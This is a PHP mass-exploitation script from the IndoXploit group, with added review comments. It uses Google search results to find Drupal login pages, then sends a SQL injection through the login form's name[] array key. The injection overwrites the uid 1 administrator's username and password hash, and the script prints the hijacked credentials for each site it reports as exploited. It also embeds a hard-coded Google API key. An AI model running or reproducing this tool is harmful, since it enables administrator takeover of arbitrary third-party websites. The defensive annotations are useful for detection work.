- <?php
- /* Tools ini Dibuat oleh Mr. Error 404 | IndoXploit - Sanjungan Jiwa
- Segala bentuk copy paste harap tidak mengubah copyright asli - hak cipta 2015 IndoXploit - Sanjungan Jiwa
- Hargailah karya sang pencipta ^_^
- Salam hangat IndoXploit Coders Team
- Karya Asli anak Bangsa !!!
- */
- set_time_limit(0); // removes PHP's execution time limit for this request
- ini_set('memory_limit', '64M'); // sets the memory limit for this request to 64M
- header('Content-Type: text/html; charset=UTF-8'); // everything below is emitted as a UTF-8 HTML page
- function letItBy() { // Pushes pending output to the client so results appear while the script is still running.
- ob_flush(); // flush PHP's own output buffer first
- flush(); // then flush the system/web-server write buffer
- }
- function google_that($query, $page=1){ // Sends $query to a Google web-search JSON endpoint; returns the 'results' array for $page, or false on a non-200 status or an empty result list.
- $resultPerPage=8; // number of results requested per call (rsz parameter)
- $start = $page*$resultPerPage; // result offset passed as the start parameter
- $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&key=AIzaSyDYG1FME1N7meBZLcywY7VojMHmtUAUIzY&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query); // NOTE(review): plain-HTTP request with an API key hard-coded in the URL; a key published in a paste should be treated as exposed
- $resultFromGoogle = json_decode( http_get($url, true) ,true); // true on http_get() adds a 1s delay; the response is decoded into an associative array
- if(isset($resultFromGoogle['responseStatus'])) { // only a decoded response carrying a status field is evaluated
- if($resultFromGoogle['responseStatus'] != '200') return false; // loose comparison against the string '200'
- if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false; // no hits for this page
- else return $resultFromGoogle['responseData']['results']; // list of hit records; the caller reads 'unescapedUrl' and 'visibleUrl' from each
- } else
- die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url ); // no status field (failed fetch or non-JSON body): the whole script stops and prints the request URL, API key included
- }
- function http_get($url, $safemode = false){ // Fetches $url with cURL and returns curl_exec()'s result: the body as a string, or false on failure.
- if($safemode === true) sleep(1); // optional fixed 1-second delay before the request
- $im = curl_init($url); // cURL handle for this single request
- curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it
- curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); // 10-second limit on the connect phase
- curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); // redirects are followed
- curl_setopt($im, CURLOPT_HEADER, 0); // response headers are not included in the returned data
- return curl_exec($im);
- curl_close(); // NOTE(review): unreachable, it sits after the return; it is also called without the handle argument
- }
- function check_injection($url){ // Removes several Drupal-style path fragments from $url, fetches what is left and returns http_get()'s result.
- return http_get(str_replace(array("/user/login","?q=node&destination=node","/user/","/login/","/drupal/"), "", $url)); // NOTE(review): despite the name, nothing is tested for injection here; the caller only uses the result as truthy/falsy, i.e. whether the stripped URL returned a non-empty body
- }
- ?>
- <!DOCTYPE html>
- <style type="text/css">
- a {
- text-decoration: none;
- color: lime;
- }
- html {
- background: #000000;
- color: #008000;
- }
- </style>
- <form method="post">
- Dork:
- <input style="border: 1px dashed #008000; background: transparent; color: #bb0000; padding-left: 5px;" type="text" id="dork" name="dork" value="inurl:/user/login" />
- <input style="border: 1px dashed #008000; background: transparent; color: #bb0000;" type="submit" value="Start" id="button"/>
- </form>
- <?php
- if(isset($_POST['dork']{0})){ // Runs only when the form posted a non-empty 'dork' value. NOTE(review): the {0} string-offset syntax was removed in PHP 8, so this line is a parse error there.
- echo "<hr width='50%' color='#008000'>";
- letItBy(); // show the separator before the slow work starts
- for($googlePage = 1; $googlePage <= 10; $googlePage++){ // walks search result pages 1..10 for the posted query
- $googleResult = google_that($_POST['dork'], $googlePage); // the posted query is passed through unchanged (google_that() URL-encodes it)
- if(!$googleResult){ // false means an error status or no results
- echo 'google dont have more result, so I done..(?)';
- break;
- }
- for($victim = 0; $victim < sizeof($googleResult); $victim++) { // one iteration per search hit; each hit is an arbitrary third-party site returned by the search
- if(check_injection($googleResult[$victim]['unescapedUrl'])){ // continues whenever fetching the hit's stripped URL returned a non-empty body
- echo "<div style='margin: 5px auto; padding-left: 7px;'>";
- $sites = "http://".$googleResult[$victim]['visibleUrl'].""; // base URL is rebuilt from visibleUrl with a fixed http:// scheme
- $log = "/user/login"; // login path, used only to build the link printed below
- $post_data = "name[0;update users set name %3D 'sjteam' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in"; // Body for the Drupal login form (form_id=user_login): the KEY of the first name[] element carries a SQL UPDATE that renames uid 1 to 'sjteam' and replaces its password hash. For defenders: login POSTs whose name[...] key contains ';' or SQL keywords, and a uid-1 account carrying this name or hash, are indicators of this tool; a patched Drupal core and an audit of the users table are the response.
- $params = array( // stream-context options for a form-encoded POST
- 'http' => array(
- 'method' => 'POST',
- 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
- 'content' => $post_data
- ));
- $ctx = stream_context_create($params);
- $data = @file_get_contents($sites . '/user/login/', null, $ctx); // sends the POST to the site's /user/login/; '@' hides warnings, so a failed request simply yields false
- if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) { // "success" is inferred from response text only: a PHP mb_strlen() warning or the echoed 'FcUk Crap' value. NOTE(review): presumably this shows the array-valued name field reached the form handler, not that the UPDATE ran; the same warning in a site's logs around /user/login is worth investigating.
- echo "Scanning: <font color=lime>$sites</font><br>";
- echo "Status: Successfully Xploited!<br>";
- echo "Data=> user: <font color='#ff3'>sjteam</font> | pass: <font color='#ff3'>admin</font><br>"; // the script asserts the hard-coded hash corresponds to 'admin'; not verifiable from this page
- echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>"; // NOTE(review): $sites comes from search results and is written into HTML and an href without escaping
- } else {
- echo "Scanning: <font color=lime>$sites</font><br>";
- echo "Status: <font color=red>Not Xploited!</font><br><br>";
- }
- } echo "</div>"; // NOTE(review): this closing tag is emitted for every hit, including hits where the opening <div> inside the if was skipped
- letItBy(); // stream this hit's result to the browser
- }
- }
- }
- ?>
- </div>
- </body>
- </html>